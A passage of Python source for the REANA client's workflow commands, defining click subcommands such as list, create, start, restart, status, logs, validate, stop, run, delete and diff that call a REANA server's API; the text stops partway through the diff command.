# under the terms of the MIT License; see LICENSE file for more details.
"""REANA client workflow related commands."""
import json
import logging
import os
import sys
import time
import traceback
import click
from jsonschema.exceptions import ValidationError
from reana_commons.config import INTERACTIVE_SESSION_TYPES, REANA_COMPUTE_BACKENDS
from reana_commons.errors import REANAValidationError
from reana_commons.operational_options import validate_operational_options
from reana_commons.utils import click_table_printer
from reana_client.cli.files import get_files, upload_files
from reana_client.cli.utils import (
add_access_token_options,
add_pagination_options,
add_workflow_option,
check_connection,
format_data,
format_session_uri,
human_readable_or_raw_option,
key_value_to_dict,
parse_filter_parameters,
parse_format_parameters,
requires_environments,
validate_workflow_name,
get_formatted_progress,
)
from reana_client.config import ERROR_MESSAGES, RUN_STATUSES, TIMECHECK
from reana_client.printer import display_message
from reana_client.utils import (
get_reana_yaml_file_path,
get_workflow_name_and_run_number,
get_workflow_status_change_msg,
is_uuid_v4,
load_reana_spec,
validate_input_parameters,
workflow_uuid_or_name,
)
@click.group(help="Workflow management commands")
@click.pass_context
def workflow_management_group(ctx):
    """Top level wrapper for workflow management."""
    # Only trace which command group was entered; subcommands do the work.
    logging.debug(ctx.info_name)
@click.group(help="Workflow execution commands")
@click.pass_context
def workflow_execution_group(ctx):
    """Top level wrapper for execution related interaction."""
    # Only trace which command group was entered; subcommands do the work.
    logging.debug(ctx.info_name)
@workflow_management_group.command("list")
@click.option(
    "-s", "--sessions", is_flag=True, help="List all open interactive sessions."
)
@click.option(
    "--format",
    "_format",
    multiple=True,
    help="Format output according to column titles or column values. "
    "Use `<column_name>=<column_value>` format. "
    "E.g. display workflow with failed status and named test_workflow "
    "`--format status=failed,name=test_workflow`.",
)
@click.option(
    "--json",
    "output_format",
    flag_value="json",
    default=None,
    help="Get output in JSON format.",
)
@click.option(
    "--all",
    "show_all",
    count=True,
    default=True,
    help="Show all workflows including deleted ones.",
)
@click.option(
    "-v",
    "--verbose",
    count=True,
    help="Print out extra information: workflow id, user id, disk usage.",
)
@human_readable_or_raw_option
@click.option(
    "--sort",
    "sort_columm_name",
    default="CREATED",
    help="Sort the output by specified column",
)
@click.option(
    "--filter",
    "filters",
    multiple=True,
    help="Filter workflow that contains certain filtering criteria. "
    "Use `--filter <column_name>=<column_value>` pairs. "
    "Available filters are `name` and `status`.",
)
@click.option(
    "--include-progress",
    "include_progress",
    is_flag=True,
    default=None,
    help="Include progress information of the workflows.",
)
@click.option(
    "--include-workspace-size",
    "include_workspace_size",
    is_flag=True,
    default=None,
    help="Include size information of the workspace.",
)
@add_access_token_options
@add_pagination_options
@check_connection
@click.pass_context
def workflow_workflows(  # noqa: C901
    ctx,
    sessions,
    _format,
    output_format,
    access_token,
    show_all,
    verbose,
    human_readable_or_raw,
    sort_columm_name,
    page,
    size,
    filters,
    include_progress,
    include_workspace_size,
):  # noqa: D301
    """List all workflows and sessions.
    The `list` command lists workflows and sessions. By default, the list of
    workflows is returned. If you would like to see the list of your open
    interactive sessions, you need to pass the `--sessions` command-line
    option.
    Example: \n
    \t $ reana-client list --all \n
    \t $ reana-client list --sessions \n
    \t $ reana-client list --verbose --bytes
    """
    import tablib
    from reana_client.api.client import get_workflows
    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    # `type` (shadows the builtin, kept for backward compatibility) selects
    # between batch workflows and interactive sessions.
    type = "interactive" if sessions else "batch"
    status_filter = None
    search_filter = None
    if filters:
        filter_names = ["name", "status"]
        status_filter, search_filter = parse_filter_parameters(filters, filter_names)
    if _format:
        parsed_format_filters = parse_format_parameters(_format)
    try:
        response = get_workflows(
            access_token,
            type,
            verbose=bool(verbose),
            page=page,
            size=size,
            status=status_filter,
            search=search_filter,
            include_progress=include_progress,
            include_workspace_size=include_workspace_size,
        )
        verbose_headers = ["id", "user"]
        workspace_size_header = ["size"]
        progress_header = ["progress"]
        headers = {
            "batch": ["name", "run_number", "created", "started", "ended", "status"],
            "interactive": [
                "name",
                "run_number",
                "created",
                "session_type",
                "session_uri",
                "session_status",
            ],
        }
        if verbose:
            headers[type] += verbose_headers
        if verbose or include_workspace_size:
            headers[type] += workspace_size_header
        if verbose or include_progress:
            headers[type] += progress_header
        data = []
        for workflow in response:
            workflow["size"] = workflow["size"][human_readable_or_raw]
            if workflow["status"] == "deleted" and not show_all:
                continue
            name, run_number = get_workflow_name_and_run_number(workflow["name"])
            workflow["name"] = name
            workflow["run_number"] = run_number
            if type == "interactive":
                workflow["session_uri"] = format_session_uri(
                    reana_server_url=ctx.obj.reana_server_url,
                    path=workflow["session_uri"],
                    access_token=access_token,
                )
            row = []
            for header in headers[type]:
                value = None
                if header in progress_header:
                    value = get_formatted_progress(workflow.get("progress"))
                elif header in ["started", "ended"]:
                    _key = (
                        "run_started_at" if header == "started" else "run_finished_at"
                    )
                    value = workflow.get("progress", {}).get(_key) or "-"
                if not value:
                    value = workflow.get(header)
                row.append(value)
            data.append(row)
        # Default sort column is "created" (index 2) unless --sort matches.
        sort_column_id = 2
        if sort_columm_name.lower() in headers[type]:
            sort_column_id = headers[type].index(sort_columm_name.lower())
        data = sorted(data, key=lambda x: x[sort_column_id], reverse=True)
        # Mark the currently activated workflow ($REANA_WORKON) with ` *`.
        workflow_ids = ["{0}.{1}".format(w[0], w[1]) for w in data]
        if os.getenv("REANA_WORKON", "") in workflow_ids:
            active_workflow_idx = workflow_ids.index(os.getenv("REANA_WORKON", ""))
            run_number_col = headers[type].index("run_number")
            # BUGFIX: the ` *` marker was previously computed into a local
            # variable but never written back to `data`, so it never showed
            # up in the printed table.
            data[active_workflow_idx][run_number_col] = (
                str(data[active_workflow_idx][run_number_col]) + " *"
            )
        tablib_data = tablib.Dataset()
        tablib_data.headers = headers[type]
        for row in data:
            tablib_data.append(row=row, tags=row)
        if _format:
            tablib_data, filtered_headers = format_data(
                parsed_format_filters, headers[type], tablib_data
            )
            if output_format:
                click.echo(json.dumps(tablib_data))
            else:
                tablib_data = [list(item.values()) for item in tablib_data]
                click_table_printer(filtered_headers, filtered_headers, tablib_data)
        else:
            if output_format:
                click.echo(tablib_data.export(output_format))
            else:
                click_table_printer(headers[type], _format, data)
    except Exception as e:
        logging.debug(traceback.format_exc())
        logging.debug(str(e))
        click.echo(
            click.style(
                "Workflow list could not be retrieved: \n{}".format(str(e)), fg="red"
            ),
            err=True,
        )
@workflow_management_group.command("create")
@click.option(
    "-f",
    "--file",
    type=click.Path(exists=True, resolve_path=True),
    default=get_reana_yaml_file_path,
    help="REANA specification file describing the workflow to "
    "execute. [default=reana.yaml]",
)
@click.option(
    "-n",
    "--name",
    "-w",
    "--workflow",
    default="",
    callback=validate_workflow_name,
    help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
    "--skip-validation",
    is_flag=True,
    help="If set, specifications file is not validated before "
    "submitting it's contents to REANA server.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_create(ctx, file, name, skip_validation, access_token):  # noqa: D301
    """Create a new workflow.
    The `create` command allows to create a new workflow from reana.yaml
    specifications file. The file is expected to be located in the current
    working directory, or supplied via command-line -f option, see examples
    below.
    Examples: \n
    \t $ reana-client create\n
    \t $ reana-client create -w myanalysis\n
    \t $ reana-client create -w myanalysis -f myreana.yaml\n
    """
    from reana_client.api.client import create_workflow
    from reana_client.utils import get_api_url
    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    # Check that name is not an UUIDv4.
    # Otherwise it would mess up `--workflow` flag usage because no distinction
    # could be made between the name and actual UUID of workflow.
    if is_uuid_v4(name):
        # NOTE(review): only reports the error; execution continues and the
        # workflow would still be submitted with this name -- confirm intended.
        display_message("Workflow name cannot be a valid UUIDv4", msg_type="error")
    try:
        reana_specification = load_reana_spec(
            click.format_filename(file), skip_validation
        )
        logging.info("Connecting to {0}".format(get_api_url()))
        response = create_workflow(reana_specification, name, access_token)
        # Print the server-assigned workflow name (includes the run number).
        click.echo(click.style(response["workflow_name"], fg="green"))
        # check if command is called from wrapper command
        if "invoked_by_subcommand" in ctx.parent.__dict__:
            ctx.parent.workflow_name = response["workflow_name"]
    except Exception as e:
        logging.debug(traceback.format_exc())
        logging.debug(str(e))
        display_message(
            "Cannot create workflow {}: \n{}".format(name, str(e)), msg_type="error"
        )
        if "invoked_by_subcommand" in ctx.parent.__dict__:
            sys.exit(1)
@workflow_execution_group.command("start")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
    "-p",
    "--parameter",
    "parameters",
    multiple=True,
    callback=key_value_to_dict,
    help="Additional input parameters to override "
    "original ones from reana.yaml. "
    "E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
    "-o",
    "--option",
    "options",
    multiple=True,
    callback=key_value_to_dict,
    help="Additional operational options for the workflow execution. "
    "E.g. CACHE=off. (workflow engine - serial) "
    "E.g. --debug (workflow engine - cwl)",
)
@click.option(
    "--follow",
    "follow",
    is_flag=True,
    default=False,
    help="If set, follows the execution of the workflow until termination.",
)
@click.pass_context
def workflow_start(
    ctx, workflow, access_token, parameters, options, follow
):  # noqa: D301
    """Start previously created workflow.
    The `start` command allows to start previously created workflow. The
    workflow execution can be further influenced by passing input parameters
    using `-p` or `--parameters` flag and by setting additional operational
    options using `-o` or `--options`. The input parameters and operational
    options can be repetitive. For example, to disable caching for the Serial
    workflow engine, you can set `-o CACHE=off`.
    Examples: \n
    \t $ reana-client start -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
    \t $ reana-client start -w myanalysis.42 -p myparam1=myvalue1 -o CACHE=off
    """
    from reana_client.utils import get_api_url
    from reana_client.api.client import (
        get_workflow_parameters,
        get_workflow_status,
        start_workflow,
    )
    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    parsed_parameters = {"input_parameters": parameters, "operational_options": options}
    if workflow:
        if parameters or options:
            # Validate the user-supplied parameters/options against the
            # workflow's original specification before starting it.
            try:
                response = get_workflow_parameters(workflow, access_token)
                workflow_type = response["type"]
                original_parameters = response["parameters"]
                validate_operational_options(
                    workflow_type, parsed_parameters["operational_options"]
                )
                parsed_parameters["input_parameters"] = validate_input_parameters(
                    parsed_parameters["input_parameters"], original_parameters
                )
            except REANAValidationError as e:
                click.secho(e.message, err=True, fg="red")
                sys.exit(1)
            except Exception as e:
                # Non-validation errors are reported but do not abort the
                # start; the workflow is still submitted below.
                click.secho(
                    "Could not apply given input parameters: "
                    "{0} \n{1}".format(parameters, str(e)),
                    err=True,
                )
        try:
            logging.info("Connecting to {0}".format(get_api_url()))
            response = start_workflow(workflow, access_token, parsed_parameters)
            current_status = get_workflow_status(workflow, access_token).get("status")
            click.secho(
                get_workflow_status_change_msg(workflow, current_status), fg="green"
            )
            if follow:
                # Poll every TIMECHECK seconds until the workflow leaves the
                # "running" state, echoing each status change.
                while "running" in current_status:
                    time.sleep(TIMECHECK)
                    current_status = get_workflow_status(workflow, access_token).get(
                        "status"
                    )
                    click.secho(
                        get_workflow_status_change_msg(workflow, current_status),
                        fg="green",
                    )
                if "finished" in current_status:
                    # NOTE(review): this inner `if follow:` is always true
                    # here since we are already inside the follow branch.
                    if follow:
                        click.secho(
                            "[INFO] Listing workflow output " "files...", bold=True
                        )
                        ctx.invoke(
                            get_files,
                            workflow=workflow,
                            access_token=access_token,
                            output_format="url",
                        )
                    sys.exit(0)
                elif "failed" in current_status or "stopped" in current_status:
                    sys.exit(1)
        except Exception as e:
            logging.debug(traceback.format_exc())
            logging.debug(str(e))
            click.echo(
                click.style(
                    "Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
                ),
                err=True,
            )
            if "invoked_by_subcommand" in ctx.parent.__dict__:
                sys.exit(1)
@workflow_execution_group.command("restart")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
    "-p",
    "--parameter",
    "parameters",
    multiple=True,
    callback=key_value_to_dict,
    help="Additional input parameters to override "
    "original ones from reana.yaml. "
    "E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
    "-o",
    "--option",
    "options",
    multiple=True,
    callback=key_value_to_dict,
    help="Additional operational options for the workflow execution. "
    "E.g. CACHE=off. (workflow engine - serial) "
    "E.g. --debug (workflow engine - cwl)",
)
@click.option(
    "-f",
    "--file",
    type=click.Path(exists=True, resolve_path=True),
    help="REANA specification file describing the workflow to "
    "execute. [default=reana.yaml]",
)
@click.pass_context
def workflow_restart(
    ctx, workflow, access_token, parameters, options, file
):  # noqa: D301
    """Restart previously run workflow.

    The `restart` command allows to restart a previous workflow on the same
    workspace.

    Note that workflow restarting can be used in a combination with operational
    options ``FROM`` and ``TARGET``. You can also pass a modified workflow
    specification with ``-f`` or `--file`` flag.

    You can furthermore use modified input parameters using `-p` or
    `--parameters` flag and by setting additional operational options using
    `-o` or `--options`. The input parameters and operational options can be
    repetitive.

    Examples: \n
    \t $ reana-client restart -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
    \t $ reana-client restart -w myanalysis.42 -p myparam=myvalue\n
    \t $ reana-client restart -w myanalysis.42 -o TARGET=gendata\n
    \t $ reana-client restart -w myanalysis.42 -o FROM=fitdata
    """
    # Imports deferred to function scope to keep CLI start-up fast.
    from reana_client.utils import get_api_url
    from reana_client.api.client import (
        get_workflow_parameters,
        get_workflow_status,
        start_workflow,
    )

    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    # ``restart: True`` asks the server to re-run within the same workspace.
    parsed_parameters = {
        "input_parameters": parameters,
        "operational_options": options,
        "restart": True,
    }
    if file:
        # A modified specification may accompany the restart request.
        parsed_parameters["reana_specification"] = load_reana_spec(
            click.format_filename(file)
        )
    if workflow:
        if parameters or options:
            try:
                # Validate overrides against either the freshly supplied
                # specification or the one stored server-side.
                if "reana_specification" in parsed_parameters:
                    workflow_type = parsed_parameters["reana_specification"][
                        "workflow"
                    ]["type"]
                    original_parameters = (
                        parsed_parameters["reana_specification"]
                        .get("inputs", {})
                        .get("parameters", {})
                    )
                else:
                    response = get_workflow_parameters(workflow, access_token)
                    workflow_type = response["type"]
                    original_parameters = response["parameters"]
                parsed_parameters["operational_options"] = validate_operational_options(
                    workflow_type, parsed_parameters["operational_options"]
                )
                parsed_parameters["input_parameters"] = validate_input_parameters(
                    parsed_parameters["input_parameters"], original_parameters
                )
            except REANAValidationError as e:
                click.secho(e.message, err=True, fg="red")
                sys.exit(1)
            except Exception as e:
                # Best-effort: warn on unexpected validation failures but
                # still attempt to start the workflow below.
                click.secho(
                    "Could not apply given input parameters: "
                    "{0} \n{1}".format(parameters, str(e)),
                    err=True,
                )
        try:
            logging.info("Connecting to {0}".format(get_api_url()))
            response = start_workflow(workflow, access_token, parsed_parameters)
            # The server assigns a new run number to the restarted workflow;
            # report status under that new identifier.
            workflow = response["workflow_name"] + "." + str(response["run_number"])
            current_status = get_workflow_status(workflow, access_token).get("status")
            click.secho(
                get_workflow_status_change_msg(workflow, current_status), fg="green"
            )
        except Exception as e:
            logging.debug(traceback.format_exc())
            logging.debug(str(e))
            click.echo(
                click.style(
                    "Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
                ),
                err=True,
            )
            # When invoked via ``reana-client run``, propagate the failure.
            if "invoked_by_subcommand" in ctx.parent.__dict__:
                sys.exit(1)
@workflow_execution_group.command("status")
@add_workflow_option
@click.option(
    "--format",
    "_format",
    multiple=True,
    help="Format output by displaying only certain columns. "
    "E.g. --format name,status.",
)
@click.option(
    "--json",
    "output_format",
    flag_value="json",
    default=None,
    help="Get output in JSON format.",
)
@add_access_token_options
@check_connection
@click.option("-v", "--verbose", count=True, help="Set status information verbosity.")
@click.pass_context
def workflow_status(  # noqa: C901
    ctx, workflow, _format, output_format, access_token, verbose
):  # noqa: D301
    """Get status of a workflow.

    The `status` command allow to retrieve status of a workflow. The status can
    be created, queued, running, failed, etc. You can increase verbosity or
    filter retrieved information by passing appropriate command-line options.

    Examples: \n
    \t $ reana-client status -w myanalysis.42 \n
    \t $ reana-client status -w myanalysis.42 -v --json
    """
    import tablib

    from reana_client.api.client import get_workflow_status

    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    if workflow:
        try:
            if _format:
                # Reduce ``--format`` specifications to bare column names.
                parsed_filters = parse_format_parameters(_format)
                _format = [item["column_name"] for item in parsed_filters]
            response = get_workflow_status(workflow, access_token)
            headers = ["name", "run_number", "created", "status"]
            verbose_headers = ["id", "user", "command"]
            data = []
            # A single workflow status arrives as a dict; normalise to a list
            # so one extraction loop handles both shapes.
            if not isinstance(response, list):
                response = [response]
            for workflow in response:
                add_data_from_reponse(workflow, data, headers)
                if verbose:
                    # NOTE(review): extending ``headers`` inside the loop would
                    # duplicate the verbose columns if the server ever returned
                    # more than one entry; harmless today (single entry) —
                    # confirm before relying on multi-entry responses.
                    headers += verbose_headers
                    add_verbose_data_from_response(
                        workflow, verbose_headers, headers, data
                    )
            if output_format:
                # Machine-readable output path (currently only JSON).
                tablib_data = tablib.Dataset()
                tablib_data.headers = headers
                for row in data:
                    tablib_data.append(row)
                if _format:
                    tablib_data = tablib_data.subset(rows=None, cols=list(_format))
                click.echo(tablib_data.export(output_format))
            else:
                # Human-readable table on stdout.
                click_table_printer(headers, _format, data)
        except Exception as e:
            logging.debug(traceback.format_exc())
            logging.debug(str(e))
            click.echo(
                click.style(
                    "Cannot retrieve the status of a workflow {}: \n{}".format(
                        workflow, str(e)
                    ),
                    fg="red",
                ),
                err=True,
            )
@workflow_execution_group.command("logs")
@add_workflow_option
@click.option("--json", "json_format", count=True, help="Get output in JSON format.")
@add_access_token_options
@click.option(
    "--filter",
    "filters",
    multiple=True,
    help="Filter job logs to include only those steps that match certain filtering criteria. Use --filter name=value pairs. Available filters are compute_backend, docker_img, status and step.",
)
@add_pagination_options
@check_connection
@click.pass_context
def workflow_logs(
    ctx,
    workflow,
    access_token,
    json_format,
    steps=None,
    filters=None,
    page=None,
    size=None,
):  # noqa: D301
    """Get workflow logs.

    The `logs` command allows to retrieve logs of running workflow. Note that
    only finished steps of the workflow are returned, the logs of the currently
    processed step is not returned until it is finished.

    Examples: \n
    \t $ reana-client logs -w myanalysis.42
    \t $ reana-client logs -w myanalysis.42 --filter step=1st_step
    """
    from reana_client.api.client import get_workflow_logs

    # Map user-facing filter names to the keys used in the job-log entries.
    available_filters = {
        "step": "job_name",
        "compute_backend": "compute_backend",
        "docker_img": "docker_img",
        "status": "status",
    }
    # Honour steps passed programmatically via the ``steps`` parameter; CLI
    # users add steps through ``--filter step=...`` below.  (Previously the
    # parameter was silently discarded by ``steps = []``.)
    steps = list(steps) if steps else []
    chosen_filters = dict()
    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    if workflow:
        if filters:
            try:
                for f in filters:
                    key, value = f.split("=")
                    if key not in available_filters:
                        click.echo(
                            click.style(
                                "Error: filter '{}' is not valid.\nAvailable filters are '{}'.".format(
                                    key, "' '".join(sorted(available_filters.keys())),
                                ),
                                fg="red",
                            ),
                            err=True,
                        )
                        sys.exit(1)
                    elif key == "step":
                        # Step filtering is resolved server-side.
                        steps.append(value)
                    else:
                        # Case insensitive for compute backends
                        if (
                            key == "compute_backend"
                            and value.lower() in REANA_COMPUTE_BACKENDS
                        ):
                            value = REANA_COMPUTE_BACKENDS[value.lower()]
                        elif key == "status" and value not in RUN_STATUSES:
                            # Fixed: a stray trailing comma previously turned
                            # this call into a throwaway tuple expression.
                            click.secho(
                                "==> ERROR: Input status value {} is not valid. ".format(
                                    value
                                ),
                                err=True,
                                fg="red",
                            )
                            sys.exit(1)
                        chosen_filters[key] = value
            except Exception as e:
                logging.debug(traceback.format_exc())
                logging.debug(str(e))
                click.echo(
                    click.style(
                        "Error: please provide complete --filter name=value pairs, for example --filter status=running.\nAvailable filters are '{}'.".format(
                            "' '".join(sorted(available_filters.keys()))
                        ),
                        fg="red",
                    ),
                    err=True,
                )
                sys.exit(1)
        try:
            response = get_workflow_logs(
                workflow,
                access_token,
                steps=None if not steps else list(set(steps)),
                page=page,
                size=size,
            )
            workflow_logs = json.loads(response["logs"])
            if filters:
                # Drop job-log entries not matching every remaining filter.
                for key, value in chosen_filters.items():
                    unwanted_steps = [
                        k
                        for k, v in workflow_logs["job_logs"].items()
                        if v[available_filters[key]] != value
                    ]
                    for job_id in unwanted_steps:
                        del workflow_logs["job_logs"][job_id]
            if json_format:
                click.echo(json.dumps(workflow_logs, indent=2))
                sys.exit(0)
            else:
                from reana_client.cli.utils import output_user_friendly_logs

                output_user_friendly_logs(
                    workflow_logs, None if not steps else list(set(steps))
                )
        except Exception as e:
            logging.debug(traceback.format_exc())
            logging.debug(str(e))
            click.echo(
                click.style(
                    "Cannot retrieve the logs of a workflow {}: \n{}".format(
                        workflow, str(e)
                    ),
                    fg="red",
                ),
                err=True,
            )
@workflow_execution_group.command("validate")
@click.option(
    "-f",
    "--file",
    type=click.Path(exists=True, resolve_path=True),
    default=get_reana_yaml_file_path,
    help="REANA specification file describing the workflow to "
    "execute. [default=reana.yaml]",
)
@click.option(
    "--environments",
    is_flag=True,
    default=False,
    help="If set, check all runtime environments specified in REANA "
    "specification file. [default=False]",
)
@click.option(
    "--pull",
    is_flag=True,
    default=False,
    callback=requires_environments,
    help="If set, try to pull remote environment image from registry to perform "
    "validation locally. Requires ``--environments`` flag. [default=False]",
)
@click.pass_context
def workflow_validate(ctx, file, environments, pull):  # noqa: D301
    """Validate workflow specification file.

    The `validate` command allows to check syntax and validate the reana.yaml
    workflow specification file.

    Examples: \n
    \t $ reana-client validate -f reana.yaml
    """
    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for param, value in ctx.params.items():
        logging.debug("{param}: {value}".format(param=param, value=value))
    # Resolve the filename once; it is reused in the validation-error message.
    filename = click.format_filename(file)
    try:
        # Loading performs the full syntax/schema validation; environment
        # checks run only when ``--environments`` was given.
        load_reana_spec(
            filename,
            skip_validate_environments=not environments,
            pull_environment_image=pull,
        )
    except (ValidationError, REANAValidationError) as validation_error:
        logging.debug(traceback.format_exc())
        logging.debug(str(validation_error))
        display_message(
            "{0} is not a valid REANA specification:\n{1}".format(
                filename, validation_error.message
            ),
            msg_type="error",
        )
    except Exception as error:
        logging.debug(traceback.format_exc())
        logging.debug(str(error))
        display_message(
            "Something went wrong when trying to validate {}".format(file),
            msg_type="error",
        )
@workflow_execution_group.command("stop")
@click.option(
    "--force",
    "force_stop",
    is_flag=True,
    default=False,
    help="Stop a workflow without waiting for jobs to finish.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_stop(ctx, workflow, force_stop, access_token):  # noqa: D301
    """Stop a running workflow.

    The `stop` command allows to hard-stop the running workflow process. Note
    that soft-stopping of the workflow is currently not supported. This command
    should be therefore used with care, only if you are absolutely sure that
    there is no point in continuing the workflow run.

    Example: \n
    \t $ reana-client stop -w myanalysis.42 --force
    """
    # Deferred import keeps CLI start-up fast.  (Removed previously unused
    # ``get_workflow_status`` from the import list.)
    from reana_client.api.client import stop_workflow

    if not force_stop:
        # Graceful (soft) stop is not supported yet; refuse without --force.
        # Fixed user-facing typo: "implement" -> "implemented".
        click.secho(
            "Graceful stop not implemented yet. If you really want to "
            "stop your workflow without waiting for jobs to finish"
            " use: --force option",
            fg="red",
        )
        raise click.Abort()

    if workflow:
        try:
            logging.info("Sending a request to stop workflow {}".format(workflow))
            stop_workflow(workflow, force_stop, access_token)
            click.secho(get_workflow_status_change_msg(workflow, "stopped"), fg="green")
        except Exception as e:
            logging.debug(traceback.format_exc())
            logging.debug(str(e))
            click.secho(
                "Cannot stop workflow {}: \n{}".format(workflow, str(e)),
                fg="red",
                err=True,
            )
@workflow_execution_group.command("run")
@click.option(
    "-f",
    "--file",
    type=click.Path(exists=True, resolve_path=True),
    default=get_reana_yaml_file_path,
    help="REANA specification file describing the workflow to "
    "execute. [default=reana.yaml]",
)
@click.option(
    "-n",
    "--name",
    "-w",
    "--workflow",
    default="",
    callback=validate_workflow_name,
    help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
    "--skip-validation",
    is_flag=True,
    help="If set, specifications file is not validated before "
    "submitting it's contents to REANA server.",
)
@click.option(
    "-p",
    "--parameter",
    "parameters",
    multiple=True,
    callback=key_value_to_dict,
    help="Additional input parameters to override "
    "original ones from reana.yaml. "
    "E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
    "-o",
    "--option",
    "options",
    multiple=True,
    callback=key_value_to_dict,
    help="Additional operational options for the workflow execution. "
    "E.g. CACHE=off.",
)
@click.option(
    "--follow",
    "follow",
    is_flag=True,
    default=False,
    help="If set, follows the execution of the workflow until termination.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_run(
    ctx, file, name, skip_validation, access_token, parameters, options, follow
):  # noqa: D301
    """Shortcut to create, upload, start a new workflow.

    The `run` command allows to create a new workflow, upload its input files
    and start it in one command.

    Examples: \n
    \t $ reana-client run -w myanalysis-test-small -p myparam=mysmallvalue \n
    \t $ reana-client run -w myanalysis-test-big -p myparam=mybigvalue
    """
    # set context parameters for subcommand
    # ``invoked_by_subcommand`` makes the invoked subcommands exit(1) on
    # failure; ``workflow_name`` is filled in by ``workflow_create`` (which
    # reads this context as ``ctx.parent``).
    ctx.invoked_by_subcommand = True
    ctx.workflow_name = ""
    # Phase 1: create the workflow from the specification file.
    click.secho("[INFO] Creating a workflow...", bold=True)
    ctx.invoke(
        workflow_create,
        file=file,
        name=name,
        skip_validation=skip_validation,
        access_token=access_token,
    )
    # Phase 2: upload all input files declared in the specification
    # (``filenames=None`` means "everything from reana.yaml").
    click.secho("[INFO] Uploading files...", bold=True)
    ctx.invoke(
        upload_files,
        workflow=ctx.workflow_name,
        filenames=None,
        access_token=access_token,
    )
    # Phase 3: start execution, optionally following it until termination.
    click.secho("[INFO] Starting workflow...", bold=True)
    ctx.invoke(
        workflow_start,
        workflow=ctx.workflow_name,
        access_token=access_token,
        parameters=parameters,
        options=options,
        follow=follow,
    )
@workflow_management_group.command("delete")
@click.option(
    "--include-all-runs",
    "all_runs",
    is_flag=True,
    help="Delete all runs of a given workflow.",
)
@click.option(
    "--include-workspace",
    "workspace",
    is_flag=True,
    help="Delete workspace from REANA.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_delete(ctx, workflow, all_runs, workspace, access_token):  # noqa: D301
    """Delete a workflow.

    The `delete` command allows to remove workflow runs from the database and
    the workspace. By default, the command removes the workflow and all its
    cached information and hides the workflow from the workflow list. Note that
    workflow workspace will still be accessible until you use
    `--include-workspace` flag. Note also that you can remove all past runs of
    a workflow by specifying `--include-all-runs` flag.

    Example: \n
    \t $ reana-client delete -w myanalysis.42 \n
    \t $ reana-client delete -w myanalysis.42 --include-all-runs \n
    \t $ reana-client delete -w myanalysis.42 --include-workspace
    """
    from reana_client.api.client import delete_workflow, get_workflow_status
    from reana_client.utils import get_api_url

    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for param, value in ctx.params.items():
        logging.debug("{param}: {value}".format(param=param, value=value))
    if not workflow:
        # Nothing to do when no workflow was resolved.
        return
    try:
        logging.info("Connecting to {0}".format(get_api_url()))
        delete_workflow(workflow, all_runs, workspace, access_token)
        if all_runs:
            msg = "All workflows named '{}' have been deleted.".format(
                workflow.split(".")[0]
            )
        else:
            msg = get_workflow_status_change_msg(workflow, "deleted")
        click.secho(msg, fg="green")
    except Exception as err:
        logging.debug(traceback.format_exc())
        logging.debug(str(err))
        click.echo(
            click.style(
                "Cannot delete workflow {} \n{}".format(workflow, str(err)), fg="red"
            ),
            err=True,
        )
@workflow_management_group.command("diff")
@click.argument(
    "workflow_a",
    default=os.environ.get("REANA_WORKON", None),
    callback=workflow_uuid_or_name,
)
@click.argument("workflow_b", callback=workflow_uuid_or_name)
@click.option(
    "-q",
    "--brief",
    is_flag=True,
    help="If not set, differences in the contents of the files in the two "
    "workspaces are shown.",
)
@click.option(
    "-u",
    "-U",
    "--unified",
    "context_lines",
    type=int,
    default=5,
    help="Sets number of context lines for workspace diff output.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_diff(
    ctx, workflow_a, workflow_b, brief, access_token, context_lines
):  # noqa: D301
    """Show diff between two workflows.

    The `diff` command allows to compare two workflows, the workflow_a and
    workflow_b, which must be provided as arguments. The output will show the
    difference in workflow run parameters, the generated files, the logs, etc.

    Examples: \n
    \t $ reana-client diff myanalysis.42 myotheranalysis.43 \n
    \t $ reana-client diff myanalysis.42 myotheranalysis.43 --brief
    """
    from reana_client.api.client import diff_workflows

    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    leading_mark = "==>"
    try:
        # The server computes both the specification diff and the workspace
        # listing diff; ``context_lines`` is forwarded as a string.
        response = diff_workflows(
            workflow_a, workflow_b, brief, access_token, str(context_lines)
        )
        if response.get("reana_specification"):
            specification_diff = json.loads(response["reana_specification"])
            # Keep only sections that actually differ.
            nonempty_sections = {k: v for k, v in specification_diff.items() if v}
            if not nonempty_sections:
                click.secho(
                    "{} No differences in REANA specifications.".format(leading_mark),
                    bold=True,
                    fg="yellow",
                )
            # Rename section workflow -> specification
            if "workflow" in nonempty_sections:
                nonempty_sections["specification"] = nonempty_sections.pop("workflow")
            for section, content in nonempty_sections.items():
